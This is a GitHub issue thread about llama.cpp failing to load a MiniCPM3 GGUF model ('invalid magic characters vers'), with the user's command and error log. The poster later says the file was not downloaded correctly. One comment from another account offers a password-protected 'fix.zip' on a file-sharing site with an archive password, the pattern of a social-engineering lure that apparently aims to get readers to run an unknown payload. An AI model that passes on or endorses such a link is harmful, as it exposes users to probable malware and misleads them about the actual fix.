### ISSUE TITLE
[Bad Case]: llama.cpp运行MiniCPM3 的 GGUF 版本进行推理报错：invalid magic characters 'vers'

### ISSUE THREAD

**Issue by klpxd** [OpenBMB/MiniCPM#250]
### Description / 描述

/opt/tmp/minicpm/llama.cpp$ ./llama-cli -c 1024 -m models/minicpm3-4b-fp16.gguf -n 1024 --top-p 0.7 --temp 0.7 --prompt "<|im_start|>user\n请写一篇关于人工智能的文章，详细介绍人工智能的未来发展和隐患。<|im_end|>\n<|im_start|>assistant\n"
Log start
main: build = 3669 (5f9c6fb2)
main: built with cc (Uos 8.3.0.3-3+rebuild) 8.3.0 for x86_64-linux-gnu
main: seed  = 1727576916
gguf_init_from_file: invalid magic characters 'vers'
llama_model_load: error loading model: llama_model_loader: failed to load model from models/minicpm3-4b-fp16.gguf

llama_load_model_from_file: failed to load model
llama_init_from_gpt_params: error: failed to load model 'models/minicpm3-4b-fp16.gguf'
main: error: unable to load model

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme

you may need to install the c compiler

**Comment by klpxd** [comment]
GGUF文件没获取正确
